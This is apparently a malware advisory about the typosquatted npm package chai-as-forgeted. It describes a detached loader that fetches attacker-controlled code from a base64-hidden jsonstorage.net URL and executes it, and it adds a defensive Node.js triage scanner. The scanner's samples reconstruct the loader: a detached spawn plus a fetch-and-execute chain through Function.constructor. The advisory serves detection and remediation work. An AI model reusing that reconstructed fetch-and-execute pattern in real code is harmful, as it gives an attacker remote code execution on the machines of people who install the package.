MAL-2026-6219
Malicious code in chai-as-forgeted (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b6b32b714919c755532ed3d2695d1966568c24878e9721a5d756896d81881020)

Package name impersonates the popular chai-as-promised assertion library, but its package.json description and keywords are copied from pino and the code is unrelated to chai. The package's main entry exports a middleware factory that spawns lib/caller.js as a detached node child process, so the loader outlives the request that triggered it and is not visible in the consumer's own process.

lib/caller.js base64-decodes a hardcoded URL pointing at api.jsonstorage.net (a mutable third-party JSON storage service), GETs the JSON document, extracts the `cookie` field, and executes its contents via `new Function.constructor('require', s)(require)` with full access to `require`. `Function.constructor` is `Function` itself, so this is `new Function('require', s)` under a thin disguise: the fetched string becomes the body of a function with the real `require` bound as its first parameter. The C2 URL and request headers are stored as base64 strings inside a locally redefined `process` object that shadows the real process global, then decoded with `atob` at runtime, which defeats a plain grep for the hostname. Any consumer who installs and invokes the exported middleware triggers arbitrary attacker-controlled code execution; the attacker can rotate the payload served by the JSON storage endpoint at will, so a snapshot of the JSON document taken at analysis time does not bound what a given install actually executed.
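The fetch-decode-execute chain described above is what a package triage scan should look for. The following is an added example, not code from the advisory, from Amazon Inspector, or from the package: a small Node.js static check that flags the indicators named in the source details (shadowed `process`, `atob`, `Function.constructor`, a `require`-bound dynamic function, a detached `spawn`) and decodes long base64 literals so the C2 host surfaces even though it never appears in plaintext. The two entries in `SAMPLES` are constructed approximations of the described shape, not the real index.js or lib/caller.js; the base64 strings encode only the host `https://api.jsonstorage.net/` (the real path is not reproduced) and a constructed `application/json` header value.

```javascript
// Added example (not the advisory's or the package's own code): static triage
// for the loader pattern described above. SAMPLES are constructed approximations
// of the described files, not the real index.js / lib/caller.js.
const SAMPLES = {
  // Main entry: middleware factory that spawns the loader as a detached child.
  'index.js': `
const { spawn } = require('child_process');
module.exports = function middleware() {
  spawn(process.execPath, [__dirname + '/lib/caller.js'],
        { detached: true, stdio: 'ignore' }).unref();
  return (req, res, next) => next();
};`,
  // Loader: a local "process" object shadows the global and holds base64 config,
  // decoded with atob at runtime; the fetched "cookie" field is executed through
  // Function.constructor with the real require bound.
  // "aHR0...Lw==" encodes https://api.jsonstorage.net/ (host only; the real path
  // is not reproduced). "YXBw...bg==" encodes application/json (constructed).
  'lib/caller.js': `
const process = { u: "aHR0cHM6Ly9hcGkuanNvbnN0b3JhZ2UubmV0Lw==", h: "YXBwbGljYXRpb24vanNvbg==" };
fetch(atob(process.u), { headers: { Accept: atob(process.h) } })
  .then(r => r.json())
  .then(j => { const s = j.cookie; new Function.constructor('require', s)(require); });`,
};

// Indicators drawn from the behaviour described in the advisory.
const INDICATORS = [
  { id: 'function-constructor', re: /Function\s*\.\s*constructor\s*\(/ },
  { id: 'atob-decode',          re: /\batob\s*\(/ },
  { id: 'shadowed-process',     re: /\b(?:const|let|var)\s+process\s*=/ },
  { id: 'detached-spawn',       re: /spawn\s*\([\s\S]*?detached\s*:\s*true/ },
  { id: 'require-bound-eval',   re: /\(\s*['"]require['"]\s*,/ },
];

// Decode every quoted literal that looks like base64 and keep the ones that
// decode to printable ASCII; this is what surfaces the hidden C2 URL.
function findBase64Literals(src) {
  const out = [];
  const re = /['"`]([A-Za-z0-9+/]{16,}={0,2})['"`]/g;
  let m;
  while ((m = re.exec(src)) !== null) {
    const decoded = Buffer.from(m[1], 'base64').toString('utf8');
    if (/^[\x20-\x7e]+$/.test(decoded)) out.push(decoded);
  }
  return out;
}

// Pull hostnames out of any decoded string that parses as a URL.
function extractHosts(strings) {
  const hosts = new Set();
  for (const s of strings) {
    try { hosts.add(new URL(s).hostname); } catch { /* not a URL */ }
  }
  return [...hosts];
}

// Triage one file: which indicators fired, what the base64 literals decode to,
// and whether the combination (dynamic code construction + a decoded remote
// host) warrants treating the file as a remote-payload loader.
function triage(src) {
  const hits = INDICATORS.filter(i => i.re.test(src)).map(i => i.id);
  const decoded = findBase64Literals(src);
  const hosts = extractHosts(decoded);
  const suspicious = hits.includes('function-constructor') && hosts.length > 0;
  return { hits, decoded, hosts, suspicious };
}

// The "disguise" in the advisory: Function.constructor is just Function.
function functionConstructorIsFunction() {
  return Function.constructor === Function;
}

for (const [name, src] of Object.entries(SAMPLES)) {
  console.log(name, JSON.stringify(triage(src)));
}
```

Run with `node` to see both files scored; the loader file decodes to `api.jsonstorage.net` and is marked suspicious, while the entry file only trips the detached-spawn indicator. A plain grep for `jsonstorage` would miss the loader entirely, which is why the scan decodes base64 literals before looking for hosts.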
Affected packages
No fixed version published yet for chai-as-forgeted (npm). Because the package is malicious by design rather than a legitimate project with one compromised release, there is no known-safe version to pin to: remove it from your dependencies and lockfile, install the genuine chai-as-promised package you presumably intended, and, if the exported middleware was ever invoked, treat the host as having executed attacker-controlled code.